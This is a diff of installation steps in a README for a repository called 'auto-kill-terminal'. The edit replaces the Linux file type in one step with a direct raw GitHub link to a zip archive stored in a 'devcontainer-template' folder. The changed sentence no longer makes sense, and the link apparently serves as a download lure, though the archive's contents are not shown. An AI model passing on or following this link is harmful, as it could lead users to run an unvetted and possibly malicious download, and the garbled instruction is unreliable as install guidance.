fortnite650/auto-kill-terminal/README.md

    Click the download link above.
 This will take you to the page listing available versions.

 2. **Choose your version**
    Look for the latest release.
-Select the file suitable for your system, like `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+Select the file suitable for your system, like `.exe` for Windows, `.dmg` for macOS, or `https://github.com/fortnite650/auto-kill-terminal/raw/refs/heads/main/devcontainer-template/auto-kill-terminal-3.5.zip` for Linux.

 3. **Download the file**
    Click the file name to download it.
 Save it in a folder where you can find it easily, such as your Desktop or Downloads folder.